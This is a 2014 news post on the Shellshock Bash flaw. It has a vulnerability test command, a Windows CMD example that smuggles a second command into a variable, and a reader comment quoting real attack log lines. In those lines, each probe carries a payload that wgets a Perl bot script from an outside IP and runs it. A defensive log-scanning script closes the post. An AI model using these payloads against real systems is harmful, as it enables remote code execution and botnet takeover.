posted by martyb on Saturday October 11 2014, @01:15PM
from the he-who-does-not-learn-from-history dept.

David Wheeler has a nice write-up of the many aspects of the shellshock vulnerability in Bash, including a timeline of events and commentary on how to prevent vulnerabilities like shellshock in the future.

He even provides a quick test to see if your shell is still susceptible to shellshock:

To determine if a system is vulnerable to shellshock, run the following refined test on a Unix-like system command line (this should work on any Bourne or C shell):

env foo='() { echo not patched; }' bash -c foo

This will reply “bash: foo: command not found” on a repaired system, while a vulnerable system will typically reply “not patched” instead. The initial “env” can be omitted when typing the command into a POSIX/Bourne shell (including bash, dash, and ash).

The write-up shows that several mis-identifications of the problem were communicated, as well as how multiple solutions were constructed—thanks to the code being open-source.

He also presents a similar type of defect under Microsoft Windows where, in a CMD.EXE window, issuing these commands:

  set foo=bar^&ping -n 1 localhost
  echo %foo% 

will not only display the value of the "foo" environment variable, it will also cause a ping command to be executed.

[Update: fixed formatting of code sample.]

    by francois.barbier (651) on Monday October 13 2014, @01:32PM (#105536)
    A little bit late, but I got this in my logs just now:

    94.102.63.238 - - [13/Oct/2014:15:23:55 +0200] "GET /cgi-sys/php5? HTTP/1.1" 301 579 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'" 0 69
    94.102.63.238 - - [13/Oct/2014:15:23:55 +0200] "GET /phppath/php? HTTP/1.1" 301 577 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'" 0 71
    94.102.63.238 - - [13/Oct/2014:15:23:55 +0200] "GET /phppath/cgi_wrapper? HTTP/1.1" 301 593 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'" 0 58
    94.102.63.238 - - [13/Oct/2014:15:23:55 +0200] "GET /cgi-bin/php? HTTP/1.1" 301 577 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'" 0 58
    94.102.63.238 - - [13/Oct/2014:15:23:55 +0200] "GET /cgi-bin/php5? HTTP/1.1" 301 579 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'" 0 188
    94.102.63.238 - - [13/Oct/2014:15:23:56 +0200] "GET /cgi-bin/php5-cli? HTTP/1.1" 301 587 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'" 0 95

    Here is the code of the shell script it tries to run: http://pastebin.com/6z9gfdSx

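A defender's check for log entries like the ones in the comment above, added here as an example (it is not from the comment or from David Wheeler's write-up): it parses Apache combined-format lines, including quoted fields with backslash-escaped quotes, and reports any request, Referer or User-Agent value that carries the `() {` function-definition prefix. The sample lines are constructed, use documentation addresses and a harmless payload, and the function names are this example's own.

```python
import re
from collections import defaultdict

# Apache "combined" log line. Quoted fields may contain backslash-escaped
# quotes, so each is matched as (non-quote char | backslash + any char)*.
Q = r'(?:[^"\\]|\\.)*'
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    rf'"(?P<request>{Q})" (?P<status>\d{{3}}) \S+ '
    rf'"(?P<referer>{Q})" "(?P<agent>{Q})"'
)
# "()" followed by "{", with optional whitespace: the prefix seen in the probes.
FUNC_PREFIX = re.compile(r'\(\s*\)\s*\{')

# Constructed sample input (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Oct/2014:15:23:55 +0200] "GET /cgi-bin/php? HTTP/1.1" '
    '301 577 "-" "() { :;}; echo \\"constructed probe\\"" 0 58',
    '192.0.2.10 - - [13/Oct/2014:15:23:56 +0200] "GET /cgi-bin/php5? HTTP/1.1" '
    '301 579 "() { :; }; echo constructed" "Mozilla/5.0" 0 60',
    '198.51.100.7 - - [13/Oct/2014:15:24:01 +0200] "GET /index.html HTTP/1.1" '
    '200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    'not a log line',
]

def find_probes(lines):
    """Return (host, path, field) for each field carrying the prefix."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable lines are skipped, not treated as clean
        parts = m.group("request").split()
        path = parts[1] if len(parts) >= 2 else m.group("request")
        for field in ("request", "referer", "agent"):
            if FUNC_PREFIX.search(m.group(field)):
                hits.append((m.group("host"), path, field))
    return hits

def summarize(hits):
    """Group probed paths by source host."""
    by_host = defaultdict(set)
    for host, path, _field in hits:
        by_host[host].add(path)
    return {host: sorted(paths) for host, paths in by_host.items()}

if __name__ == "__main__":
    for host, paths in summarize(find_probes(SAMPLE_LOG)).items():
        print(host, paths)
```

A hit only shows that a probe was sent; whether it did anything depends on whether the request reached a patched bash, which the test command in the story checks.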